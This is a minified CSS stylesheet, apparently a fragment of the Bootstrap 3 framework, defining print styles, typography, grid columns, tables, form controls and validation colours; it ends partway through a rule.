print{*,:after,:before{color:#000!important;text-shadow:none!important;background:0 0!important;-webkit-box-shadow:none!important;box-shadow:none!important}a,a:visited{text-decoration:underline}a[href]:after{content:" (" attr(href) ")"}abbr[title]:after{content:" (" attr(title) ")"}a[href^="#"]:after,a[href^="javascript:"]:after{content:""}blockquote,pre{border:1px solid #999;page-break-inside:avoid}thead{display:table-header-group}img,tr{page-break-inside:avoid}img{max-width:100%!important}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}.navbar{display:none}.btn>.caret,.dropup>.btn>.caret{border-top-color:#000!important}.label{border:1px solid #000}.table{border-collapse:collapse!important}.table td,.table th{background-color:#fff!important}.table-bordered td,.table-bordered th{border:1px solid #ddd!important}}*{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}:after,:before{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}html{font-size:10px;-webkit-tap-highlight-color:rgba(0,0,0,0)}body{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:1.42857143;color:#333;background-color:#fff}button,input,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a{color:#337ab7;text-decoration:none}a:focus,a:hover{color:#23527c;text-decoration:underline}a:focus{outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}figure{margin:0}img{vertical-align:middle}.carousel-inner>.item>a>img,.carousel-inner>.item>img,.img-responsive,.thumbnail a>img,.thumbnail>img{display:block;max-width:100%;height:auto}.img-rounded{border-radius:6px}.img-thumbnail{padding:4px;line-height:1.42857143;background-color:#fff;border:1px solid #ddd;border-radius:4px;-webkit-transition:all .2s ease-in-out;-o-transition:all .2s ease-in-out;transition:all .2s ease-in-out;display:inline-block;max-width:100%;height:auto}.img-circle{border-radius:50%}hr{margin-top:20px;margin-bottom:20px;border:0;border-top:1px solid #eee}.sr-only{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0,0,0,0);border:0}.sr-only-focusable:active,.sr-only-focusable:focus{position:static;width:auto;height:auto;margin:0;overflow:visible;clip:auto}[role=button]{cursor:pointer}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{font-family:inherit;font-weight:500;line-height:1.1;color:inherit}.h1 .small,.h1 small,.h2 .small,.h2 small,.h3 .small,.h3 small,.h4 .small,.h4 small,.h5 .small,.h5 small,.h6 .small,.h6 small,h1 .small,h1 small,h2 .small,h2 small,h3 .small,h3 small,h4 .small,h4 small,h5 .small,h5 small,h6 .small,h6 small{font-weight:400;line-height:1;color:#777}.h1,.h2,.h3,h1,h2,h3{margin-top:20px;margin-bottom:10px}.h1 .small,.h1 small,.h2 .small,.h2 small,.h3 .small,.h3 small,h1 .small,h1 small,h2 .small,h2 small,h3 .small,h3 small{font-size:65%}.h4,.h5,.h6,h4,h5,h6{margin-top:10px;margin-bottom:10px}.h4 .small,.h4 small,.h5 .small,.h5 small,.h6 .small,.h6 small,h4 .small,h4 small,h5 .small,h5 small,h6 .small,h6 small{font-size:75%}.h1,h1{font-size:36px}.h2,h2{font-size:30px}.h3,h3{font-size:24px}.h4,h4{font-size:18px}.h5,h5{font-size:14px}.h6,h6{font-size:12px}p{margin:0 0 10px}.lead{margin-bottom:20px;font-size:16px;font-weight:300;line-height:1.4}@media (min-width:768px){.lead{font-size:21px}}.small,small{font-size:85%}.mark,mark{padding:.2em;background-color:#fcf8e3}.text-left{text-align:left}.text-right{text-align:right}.text-center{text-align:center}.text-justify{text-align:justify}.text-nowrap{white-space:nowrap}.text-lowercase{text-transform:lowercase}.text-uppercase{text-transform:uppercase}.text-capitalize{text-transform:capitalize}.text-muted{color:#777}.text-primary{color:#337ab7}a.text-primary:focus,a.text-primary:hover{color:#286090}.text-success{color:#3c763d}a.text-success:focus,a.text-success:hover{color:#2b542c}.text-info{color:#31708f}a.text-info:focus,a.text-info:hover{color:#245269}.text-warning{color:#8a6d3b}a.text-warning:focus,a.text-warning:hover{color:#66512c}.text-danger{color:#a94442}a.text-danger:focus,a.text-danger:hover{color:#843534}.bg-primary{color:#fff;background-color:#337ab7}a.bg-primary:focus,a.bg-primary:hover{background-color:#286090}.bg-success{background-color:#dff0d8}a.bg-success:focus,a.bg-success:hover{background-color:#c1e2b3}.bg-info{background-color:#d9edf7}a.bg-info:focus,a.bg-info:hover{background-color:#afd9ee}.bg-warning{background-color:#fcf8e3}a.bg-warning:focus,a.bg-warning:hover{background-color:#f7ecb5}.bg-danger{background-color:#f2dede}a.bg-danger:focus,a.bg-danger:hover{background-color:#e4b9b9}.page-header{padding-bottom:9px;margin:40px 0 20px;border-bottom:1px solid #eee}ol,ul{margin-top:0;margin-bottom:10px}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}.list-unstyled{padding-left:0;list-style:none}.list-inline{padding-left:0;list-style:none;margin-left:-5px}.list-inline>li{display:inline-block;padding-right:5px;padding-left:5px}dl{margin-top:0;margin-bottom:20px}dd,dt{line-height:1.42857143}dt{font-weight:700}dd{margin-left:0}@media (min-width:768px){.dl-horizontal dt{float:left;width:160px;clear:left;text-align:right;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.dl-horizontal dd{margin-left:180px}}abbr[data-original-title],abbr[title]{cursor:help}.initialism{font-size:90%;text-transform:uppercase}blockquote{padding:10px 20px;margin:0 0 20px;font-size:17.5px;border-left:5px solid #eee}blockquote ol:last-child,blockquote p:last-child,blockquote ul:last-child{margin-bottom:0}blockquote .small,blockquote footer,blockquote small{display:block;font-size:80%;line-height:1.42857143;color:#777}blockquote .small:before,blockquote footer:before,blockquote small:before{content:"\2014 \00A0"}.blockquote-reverse,blockquote.pull-right{padding-right:15px;padding-left:0;text-align:right;border-right:5px solid #eee;border-left:0}.blockquote-reverse .small:before,.blockquote-reverse footer:before,.blockquote-reverse small:before,blockquote.pull-right .small:before,blockquote.pull-right footer:before,blockquote.pull-right small:before{content:""}.blockquote-reverse .small:after,.blockquote-reverse footer:after,.blockquote-reverse small:after,blockquote.pull-right .small:after,blockquote.pull-right footer:after,blockquote.pull-right small:after{content:"\00A0 \2014"}address{margin-bottom:20px;font-style:normal;line-height:1.42857143}code,kbd,pre,samp{font-family:Menlo,Monaco,Consolas,"Courier New",monospace}code{padding:2px 4px;font-size:90%;color:#c7254e;background-color:#f9f2f4;border-radius:4px}kbd{padding:2px 4px;font-size:90%;color:#fff;background-color:#333;border-radius:3px;-webkit-box-shadow:inset 0 -1px 0 rgba(0,0,0,.25);box-shadow:inset 0 -1px 0 rgba(0,0,0,.25)}kbd kbd{padding:0;font-size:100%;font-weight:700;-webkit-box-shadow:none;box-shadow:none}pre{display:block;padding:9.5px;margin:0 0 10px;font-size:13px;line-height:1.42857143;color:#333;word-break:break-all;word-wrap:break-word;background-color:#f5f5f5;border:1px solid #ccc;border-radius:4px}pre code{padding:0;font-size:inherit;color:inherit;white-space:pre-wrap;background-color:transparent;border-radius:0}.pre-scrollable{max-height:340px;overflow-y:scroll}.container{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}@media (min-width:768px){.container{width:750px}}@media (min-width:992px){.container{width:970px}}@media (min-width:1200px){.container{width:1170px}}.container-fluid{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}.row{margin-right:-15px;margin-left:-15px}.row-no-gutters{margin-right:0;margin-left:0}.row-no-gutters [class*=col-]{padding-right:0;padding-left:0}.col-lg-1,.col-lg-10,.col-lg-11,.col-lg-12,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-xs-1,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9{position:relative;min-height:1px;padding-right:15px;padding-left:15px}.col-xs-1,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9{float:left}.col-xs-12{width:100%}.col-xs-11{width:91.66666667%}.col-xs-10{width:83.33333333%}.col-xs-9{width:75%}.col-xs-8{width:66.66666667%}.col-xs-7{width:58.33333333%}.col-xs-6{width:50%}.col-xs-5{width:41.66666667%}.col-xs-4{width:33.33333333%}.col-xs-3{width:25%}.col-xs-2{width:16.66666667%}.col-xs-1{width:8.33333333%}.col-xs-pull-12{right:100%}.col-xs-pull-11{right:91.66666667%}.col-xs-pull-10{right:83.33333333%}.col-xs-pull-9{right:75%}.col-xs-pull-8{right:66.66666667%}.col-xs-pull-7{right:58.33333333%}.col-xs-pull-6{right:50%}.col-xs-pull-5{right:41.66666667%}.col-xs-pull-4{right:33.33333333%}.col-xs-pull-3{right:25%}.col-xs-pull-2{right:16.66666667%}.col-xs-pull-1{right:8.33333333%}.col-xs-pull-0{right:auto}.col-xs-push-12{left:100%}.col-xs-push-11{left:91.66666667%}.col-xs-push-10{left:83.33333333%}.col-xs-push-9{left:75%}.col-xs-push-8{left:66.66666667%}.col-xs-push-7{left:58.33333333%}.col-xs-push-6{left:50%}.col-xs-push-5{left:41.66666667%}.col-xs-push-4{left:33.33333333%}.col-xs-push-3{left:25%}.col-xs-push-2{left:16.66666667%}.col-xs-push-1{left:8.33333333%}.col-xs-push-0{left:auto}.col-xs-offset-12{margin-left:100%}.col-xs-offset-11{margin-left:91.66666667%}.col-xs-offset-10{margin-left:83.33333333%}.col-xs-offset-9{margin-left:75%}.col-xs-offset-8{margin-left:66.66666667%}.col-xs-offset-7{margin-left:58.33333333%}.col-xs-offset-6{margin-left:50%}.col-xs-offset-5{margin-left:41.66666667%}.col-xs-offset-4{margin-left:33.33333333%}.col-xs-offset-3{margin-left:25%}.col-xs-offset-2{margin-left:16.66666667%}.col-xs-offset-1{margin-left:8.33333333%}.col-xs-offset-0{margin-left:0}@media (min-width:768px){.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9{float:left}.col-sm-12{width:100%}.col-sm-11{width:91.66666667%}.col-sm-10{width:83.33333333%}.col-sm-9{width:75%}.col-sm-8{width:66.66666667%}.col-sm-7{width:58.33333333%}.col-sm-6{width:50%}.col-sm-5{width:41.66666667%}.col-sm-4{width:33.33333333%}.col-sm-3{width:25%}.col-sm-2{width:16.66666667%}.col-sm-1{width:8.33333333%}.col-sm-pull-12{right:100%}.col-sm-pull-11{right:91.66666667%}.col-sm-pull-10{right:83.33333333%}.col-sm-pull-9{right:75%}.col-sm-pull-8{right:66.66666667%}.col-sm-pull-7{right:58.33333333%}.col-sm-pull-6{right:50%}.col-sm-pull-5{right:41.66666667%}.col-sm-pull-4{right:33.33333333%}.col-sm-pull-3{right:25%}.col-sm-pull-2{right:16.66666667%}.col-sm-pull-1{right:8.33333333%}.col-sm-pull-0{right:auto}.col-sm-push-12{left:100%}.col-sm-push-11{left:91.66666667%}.col-sm-push-10{left:83.33333333%}.col-sm-push-9{left:75%}.col-sm-push-8{left:66.66666667%}.col-sm-push-7{left:58.33333333%}.col-sm-push-6{left:50%}.col-sm-push-5{left:41.66666667%}.col-sm-push-4{left:33.33333333%}.col-sm-push-3{left:25%}.col-sm-push-2{left:16.66666667%}.col-sm-push-1{left:8.33333333%}.col-sm-push-0{left:auto}.col-sm-offset-12{margin-left:100%}.col-sm-offset-11{margin-left:91.66666667%}.col-sm-offset-10{margin-left:83.33333333%}.col-sm-offset-9{margin-left:75%}.col-sm-offset-8{margin-left:66.66666667%}.col-sm-offset-7{margin-left:58.33333333%}.col-sm-offset-6{margin-left:50%}.col-sm-offset-5{margin-left:41.66666667%}.col-sm-offset-4{margin-left:33.33333333%}.col-sm-offset-3{margin-left:25%}.col-sm-offset-2{margin-left:16.66666667%}.col-sm-offset-1{margin-left:8.33333333%}.col-sm-offset-0{margin-left:0}}@media (min-width:992px){.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9{float:left}.col-md-12{width:100%}.col-md-11{width:91.66666667%}.col-md-10{width:83.33333333%}.col-md-9{width:75%}.col-md-8{width:66.66666667%}.col-md-7{width:58.33333333%}.col-md-6{width:50%}.col-md-5{width:41.66666667%}.col-md-4{width:33.33333333%}.col-md-3{width:25%}.col-md-2{width:16.66666667%}.col-md-1{width:8.33333333%}.col-md-pull-12{right:100%}.col-md-pull-11{right:91.66666667%}.col-md-pull-10{right:83.33333333%}.col-md-pull-9{right:75%}.col-md-pull-8{right:66.66666667%}.col-md-pull-7{right:58.33333333%}.col-md-pull-6{right:50%}.col-md-pull-5{right:41.66666667%}.col-md-pull-4{right:33.33333333%}.col-md-pull-3{right:25%}.col-md-pull-2{right:16.66666667%}.col-md-pull-1{right:8.33333333%}.col-md-pull-0{right:auto}.col-md-push-12{left:100%}.col-md-push-11{left:91.66666667%}.col-md-push-10{left:83.33333333%}.col-md-push-9{left:75%}.col-md-push-8{left:66.66666667%}.col-md-push-7{left:58.33333333%}.col-md-push-6{left:50%}.col-md-push-5{left:41.66666667%}.col-md-push-4{left:33.33333333%}.col-md-push-3{left:25%}.col-md-push-2{left:16.66666667%}.col-md-push-1{left:8.33333333%}.col-md-push-0{left:auto}.col-md-offset-12{margin-left:100%}.col-md-offset-11{margin-left:91.66666667%}.col-md-offset-10{margin-left:83.33333333%}.col-md-offset-9{margin-left:75%}.col-md-offset-8{margin-left:66.66666667%}.col-md-offset-7{margin-left:58.33333333%}.col-md-offset-6{margin-left:50%}.col-md-offset-5{margin-left:41.66666667%}.col-md-offset-4{margin-left:33.33333333%}.col-md-offset-3{margin-left:25%}.col-md-offset-2{margin-left:16.66666667%}.col-md-offset-1{margin-left:8.33333333%}.col-md-offset-0{margin-left:0}}@media (min-width:1200px){.col-lg-1,.col-lg-10,.col-lg-11,.col-lg-12,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9{float:left}.col-lg-12{width:100%}.col-lg-11{width:91.66666667%}.col-lg-10{width:83.33333333%}.col-lg-9{width:75%}.col-lg-8{width:66.66666667%}.col-lg-7{width:58.33333333%}.col-lg-6{width:50%}.col-lg-5{width:41.66666667%}.col-lg-4{width:33.33333333%}.col-lg-3{width:25%}.col-lg-2{width:16.66666667%}.col-lg-1{width:8.33333333%}.col-lg-pull-12{right:100%}.col-lg-pull-11{right:91.66666667%}.col-lg-pull-10{right:83.33333333%}.col-lg-pull-9{right:75%}.col-lg-pull-8{right:66.66666667%}.col-lg-pull-7{right:58.33333333%}.col-lg-pull-6{right:50%}.col-lg-pull-5{right:41.66666667%}.col-lg-pull-4{right:33.33333333%}.col-lg-pull-3{right:25%}.col-lg-pull-2{right:16.66666667%}.col-lg-pull-1{right:8.33333333%}.col-lg-pull-0{right:auto}.col-lg-push-12{left:100%}.col-lg-push-11{left:91.66666667%}.col-lg-push-10{left:83.33333333%}.col-lg-push-9{left:75%}.col-lg-push-8{left:66.66666667%}.col-lg-push-7{left:58.33333333%}.col-lg-push-6{left:50%}.col-lg-push-5{left:41.66666667%}.col-lg-push-4{left:33.33333333%}.col-lg-push-3{left:25%}.col-lg-push-2{left:16.66666667%}.col-lg-push-1{left:8.33333333%}.col-lg-push-0{left:auto}.col-lg-offset-12{margin-left:100%}.col-lg-offset-11{margin-left:91.66666667%}.col-lg-offset-10{margin-left:83.33333333%}.col-lg-offset-9{margin-left:75%}.col-lg-offset-8{margin-left:66.66666667%}.col-lg-offset-7{margin-left:58.33333333%}.col-lg-offset-6{margin-left:50%}.col-lg-offset-5{margin-left:41.66666667%}.col-lg-offset-4{margin-left:33.33333333%}.col-lg-offset-3{margin-left:25%}.col-lg-offset-2{margin-left:16.66666667%}.col-lg-offset-1{margin-left:8.33333333%}.col-lg-offset-0{margin-left:0}}table{background-color:transparent}table col[class*=col-]{position:static;display:table-column;float:none}table td[class*=col-],table th[class*=col-]{position:static;display:table-cell;float:none}caption{padding-top:8px;padding-bottom:8px;color:#777;text-align:left}th{text-align:left}.table{width:100%;max-width:100%;margin-bottom:20px}.table>tbody>tr>td,.table>tbody>tr>th,.table>tfoot>tr>td,.table>tfoot>tr>th,.table>thead>tr>td,.table>thead>tr>th{padding:8px;line-height:1.42857143;vertical-align:top;border-top:1px solid #ddd}.table>thead>tr>th{vertical-align:bottom;border-bottom:2px solid #ddd}.table>caption+thead>tr:first-child>td,.table>caption+thead>tr:first-child>th,.table>colgroup+thead>tr:first-child>td,.table>colgroup+thead>tr:first-child>th,.table>thead:first-child>tr:first-child>td,.table>thead:first-child>tr:first-child>th{border-top:0}.table>tbody+tbody{border-top:2px solid #ddd}.table .table{background-color:#fff}.table-condensed>tbody>tr>td,.table-condensed>tbody>tr>th,.table-condensed>tfoot>tr>td,.table-condensed>tfoot>tr>th,.table-condensed>thead>tr>td,.table-condensed>thead>tr>th{padding:5px}.table-bordered{border:1px solid #ddd}.table-bordered>tbody>tr>td,.table-bordered>tbody>tr>th,.table-bordered>tfoot>tr>td,.table-bordered>tfoot>tr>th,.table-bordered>thead>tr>td,.table-bordered>thead>tr>th{border:1px solid #ddd}.table-bordered>thead>tr>td,.table-bordered>thead>tr>th{border-bottom-width:2px}.table-striped>tbody>tr:nth-of-type(odd){background-color:#f9f9f9}.table-hover>tbody>tr:hover{background-color:#f5f5f5}.table>tbody>tr.active>td,.table>tbody>tr.active>th,.table>tbody>tr>td.active,.table>tbody>tr>th.active,.table>tfoot>tr.active>td,.table>tfoot>tr.active>th,.table>tfoot>tr>td.active,.table>tfoot>tr>th.active,.table>thead>tr.active>td,.table>thead>tr.active>th,.table>thead>tr>td.active,.table>thead>tr>th.active{background-color:#f5f5f5}.table-hover>tbody>tr.active:hover>td,.table-hover>tbody>tr.active:hover>th,.table-hover>tbody>tr:hover>.active,.table-hover>tbody>tr>td.active:hover,.table-hover>tbody>tr>th.active:hover{background-color:#e8e8e8}.table>tbody>tr.success>td,.table>tbody>tr.success>th,.table>tbody>tr>td.success,.table>tbody>tr>th.success,.table>tfoot>tr.success>td,.table>tfoot>tr.success>th,.table>tfoot>tr>td.success,.table>tfoot>tr>th.success,.table>thead>tr.success>td,.table>thead>tr.success>th,.table>thead>tr>td.success,.table>thead>tr>th.success{background-color:#dff0d8}.table-hover>tbody>tr.success:hover>td,.table-hover>tbody>tr.success:hover>th,.table-hover>tbody>tr:hover>.success,.table-hover>tbody>tr>td.success:hover,.table-hover>tbody>tr>th.success:hover{background-color:#d0e9c6}.table>tbody>tr.info>td,.table>tbody>tr.info>th,.table>tbody>tr>td.info,.table>tbody>tr>th.info,.table>tfoot>tr.info>td,.table>tfoot>tr.info>th,.table>tfoot>tr>td.info,.table>tfoot>tr>th.info,.table>thead>tr.info>td,.table>thead>tr.info>th,.table>thead>tr>td.info,.table>thead>tr>th.info{background-color:#d9edf7}.table-hover>tbody>tr.info:hover>td,.table-hover>tbody>tr.info:hover>th,.table-hover>tbody>tr:hover>.info,.table-hover>tbody>tr>td.info:hover,.table-hover>tbody>tr>th.info:hover{background-color:#c4e3f3}.table>tbody>tr.warning>td,.table>tbody>tr.warning>th,.table>tbody>tr>td.warning,.table>tbody>tr>th.warning,.table>tfoot>tr.warning>td,.table>tfoot>tr.warning>th,.table>tfoot>tr>td.warning,.table>tfoot>tr>th.warning,.table>thead>tr.warning>td,.table>thead>tr.warning>th,.table>thead>tr>td.warning,.table>thead>tr>th.warning{background-color:#fcf8e3}.table-hover>tbody>tr.warning:hover>td,.table-hover>tbody>tr.warning:hover>th,.table-hover>tbody>tr:hover>.warning,.table-hover>tbody>tr>td.warning:hover,.table-hover>tbody>tr>th.warning:hover{background-color:#faf2cc}.table>tbody>tr.danger>td,.table>tbody>tr.danger>th,.table>tbody>tr>td.danger,.table>tbody>tr>th.danger,.table>tfoot>tr.danger>td,.table>tfoot>tr.danger>th,.table>tfoot>tr>td.danger,.table>tfoot>tr>th.danger,.table>thead>tr.danger>td,.table>thead>tr.danger>th,.table>thead>tr>td.danger,.table>thead>tr>th.danger{background-color:#f2dede}.table-hover>tbody>tr.danger:hover>td,.table-hover>tbody>tr.danger:hover>th,.table-hover>tbody>tr:hover>.danger,.table-hover>tbody>tr>td.danger:hover,.table-hover>tbody>tr>th.danger:hover{background-color:#ebcccc}.table-responsive{min-height:.01%;overflow-x:auto}@media screen and (max-width:767px){.table-responsive{width:100%;margin-bottom:15px;overflow-y:hidden;-ms-overflow-style:-ms-autohiding-scrollbar;border:1px solid #ddd}.table-responsive>.table{margin-bottom:0}.table-responsive>.table>tbody>tr>td,.table-responsive>.table>tbody>tr>th,.table-responsive>.table>tfoot>tr>td,.table-responsive>.table>tfoot>tr>th,.table-responsive>.table>thead>tr>td,.table-responsive>.table>thead>tr>th{white-space:nowrap}.table-responsive>.table-bordered{border:0}.table-responsive>.table-bordered>tbody>tr>td:first-child,.table-responsive>.table-bordered>tbody>tr>th:first-child,.table-responsive>.table-bordered>tfoot>tr>td:first-child,.table-responsive>.table-bordered>tfoot>tr>th:first-child,.table-responsive>.table-bordered>thead>tr>td:first-child,.table-responsive>.table-bordered>thead>tr>th:first-child{border-left:0}.table-responsive>.table-bordered>tbody>tr>td:last-child,.table-responsive>.table-bordered>tbody>tr>th:last-child,.table-responsive>.table-bordered>tfoot>tr>td:last-child,.table-responsive>.table-bordered>tfoot>tr>th:last-child,.table-responsive>.table-bordered>thead>tr>td:last-child,.table-responsive>.table-bordered>thead>tr>th:last-child{border-right:0}.table-responsive>.table-bordered>tbody>tr:last-child>td,.table-responsive>.table-bordered>tbody>tr:last-child>th,.table-responsive>.table-bordered>tfoot>tr:last-child>td,.table-responsive>.table-bordered>tfoot>tr:last-child>th{border-bottom:0}}fieldset{min-width:0;padding:0;margin:0;border:0}legend{display:block;width:100%;padding:0;margin-bottom:20px;font-size:21px;line-height:inherit;color:#333;border:0;border-bottom:1px solid #e5e5e5}label{display:inline-block;max-width:100%;margin-bottom:5px;font-weight:700}input[type=search]{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;-webkit-appearance:none;-moz-appearance:none;appearance:none}input[type=checkbox],input[type=radio]{margin:4px 0 0;margin-top:1px\9;line-height:normal}fieldset[disabled] input[type=checkbox],fieldset[disabled] input[type=radio],input[type=checkbox].disabled,input[type=checkbox][disabled],input[type=radio].disabled,input[type=radio][disabled]{cursor:not-allowed}input[type=file]{display:block}input[type=range]{display:block;width:100%}select[multiple],select[size]{height:auto}input[type=checkbox]:focus,input[type=file]:focus,input[type=radio]:focus{outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}output{display:block;padding-top:7px;font-size:14px;line-height:1.42857143;color:#555}.form-control{display:block;width:100%;height:34px;padding:6px 12px;font-size:14px;line-height:1.42857143;color:#555;background-color:#fff;background-image:none;border:1px solid #ccc;border-radius:4px;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075);box-shadow:inset 0 1px 1px rgba(0,0,0,.075);-webkit-transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s;-o-transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s;-webkit-transition:border-color ease-in-out .15s,-webkit-box-shadow ease-in-out .15s;transition:border-color ease-in-out .15s,-webkit-box-shadow ease-in-out .15s;transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s;transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s,-webkit-box-shadow ease-in-out .15s}.form-control:focus{border-color:#66afe9;outline:0;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 8px rgba(102,175,233,.6);box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 8px rgba(102,175,233,.6)}.form-control::-moz-placeholder{color:#999;opacity:1}.form-control:-ms-input-placeholder{color:#999}.form-control::-webkit-input-placeholder{color:#999}.form-control::-ms-expand{background-color:transparent;border:0}.form-control[disabled],.form-control[readonly],fieldset[disabled] .form-control{background-color:#eee;opacity:1}.form-control[disabled],fieldset[disabled] .form-control{cursor:not-allowed}textarea.form-control{height:auto}@media screen and (-webkit-min-device-pixel-ratio:0){input[type=date].form-control,input[type=datetime-local].form-control,input[type=month].form-control,input[type=time].form-control{line-height:34px}.input-group-sm input[type=date],.input-group-sm input[type=datetime-local],.input-group-sm input[type=month],.input-group-sm input[type=time],input[type=date].input-sm,input[type=datetime-local].input-sm,input[type=month].input-sm,input[type=time].input-sm{line-height:30px}.input-group-lg input[type=date],.input-group-lg input[type=datetime-local],.input-group-lg input[type=month],.input-group-lg input[type=time],input[type=date].input-lg,input[type=datetime-local].input-lg,input[type=month].input-lg,input[type=time].input-lg{line-height:46px}}.form-group{margin-bottom:15px}.checkbox,.radio{position:relative;display:block;margin-top:10px;margin-bottom:10px}.checkbox.disabled label,.radio.disabled label,fieldset[disabled] .checkbox label,fieldset[disabled] .radio label{cursor:not-allowed}.checkbox label,.radio label{min-height:20px;padding-left:20px;margin-bottom:0;font-weight:400;cursor:pointer}.checkbox input[type=checkbox],.checkbox-inline input[type=checkbox],.radio input[type=radio],.radio-inline input[type=radio]{position:absolute;margin-top:4px\9;margin-left:-20px}.checkbox+.checkbox,.radio+.radio{margin-top:-5px}.checkbox-inline,.radio-inline{position:relative;display:inline-block;padding-left:20px;margin-bottom:0;font-weight:400;vertical-align:middle;cursor:pointer}.checkbox-inline.disabled,.radio-inline.disabled,fieldset[disabled] .checkbox-inline,fieldset[disabled] .radio-inline{cursor:not-allowed}.checkbox-inline+.checkbox-inline,.radio-inline+.radio-inline{margin-top:0;margin-left:10px}.form-control-static{min-height:34px;padding-top:7px;padding-bottom:7px;margin-bottom:0}.form-control-static.input-lg,.form-control-static.input-sm{padding-right:0;padding-left:0}.input-sm{height:30px;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}select.input-sm{height:30px;line-height:30px}select[multiple].input-sm,textarea.input-sm{height:auto}.form-group-sm .form-control{height:30px;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}.form-group-sm select.form-control{height:30px;line-height:30px}.form-group-sm select[multiple].form-control,.form-group-sm textarea.form-control{height:auto}.form-group-sm .form-control-static{height:30px;min-height:32px;padding:6px 10px;font-size:12px;line-height:1.5}.input-lg{height:46px;padding:10px 16px;font-size:18px;line-height:1.3333333;border-radius:6px}select.input-lg{height:46px;line-height:46px}select[multiple].input-lg,textarea.input-lg{height:auto}.form-group-lg .form-control{height:46px;padding:10px 16px;font-size:18px;line-height:1.3333333;border-radius:6px}.form-group-lg select.form-control{height:46px;line-height:46px}.form-group-lg select[multiple].form-control,.form-group-lg textarea.form-control{height:auto}.form-group-lg .form-control-static{height:46px;min-height:38px;padding:11px 16px;font-size:18px;line-height:1.3333333}.has-feedback{position:relative}.has-feedback .form-control{padding-right:42.5px}.form-control-feedback{position:absolute;top:0;right:0;z-index:2;display:block;width:34px;height:34px;line-height:34px;text-align:center;pointer-events:none}.form-group-lg .form-control+.form-control-feedback,.input-group-lg+.form-control-feedback,.input-lg+.form-control-feedback{width:46px;height:46px;line-height:46px}.form-group-sm .form-control+.form-control-feedback,.input-group-sm+.form-control-feedback,.input-sm+.form-control-feedback{width:30px;height:30px;line-height:30px}.has-success .checkbox,.has-success .checkbox-inline,.has-success .control-label,.has-success .help-block,.has-success .radio,.has-success .radio-inline,.has-success.checkbox label,.has-success.checkbox-inline label,.has-success.radio label,.has-success.radio-inline label{color:#3c763d}.has-success .form-control{border-color:#3c763d;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075);box-shadow:inset 0 1px 1px rgba(0,0,0,.075)}.has-success .form-control:focus{border-color:#2b542c;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #67b168;box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #67b168}.has-success .input-group-addon{color:#3c763d;background-color:#dff0d8;border-color:#3c763d}.has-success .form-control-feedback{color:#3c763d}.has-warning .checkbox,.has-warning .checkbox-inline,.has-warning .control-label,.has-warning .help-block,.has-warning .radio,.has-warning .radio-inline,.has-warning.checkbox label,.has-warning.checkbox-inline label,.has-warning.radio label,.has-warning.radio-inline label{color:#8a6d3b}.has-warning .form-control{border-color:#8a6d3b;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075);box-shadow:inset 0 1px 1px rgba(0,0,0,.075)}.has-warning .form-control:focus{border-color:#66512c;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #c0a16b;box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #c0a16b}.has-warning .input-group-addon{color:#8a6d3b;background-color:#fcf8e3;border-color:#8a6d3b}.has-warning .form-control-feedback{color:#8a6d3b}.has-error .checkbox,.has-error .checkbox-inline,.has-error .control-label,.has-error .help-block,.has-error .radio,.has-error .radio-inline,.has-error.checkbox label,.has-error.checkbox-inline label,.has-error.radio label,.has-error.radio-inline label{color:#a94442}.has-error .form-control{border-color:#a94442;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075);box-shadow:inset 0 1px 1px rgba(0,0,0,.075)}.has-error .form-control:focus{border-color:#843534;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #ce8483;box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px 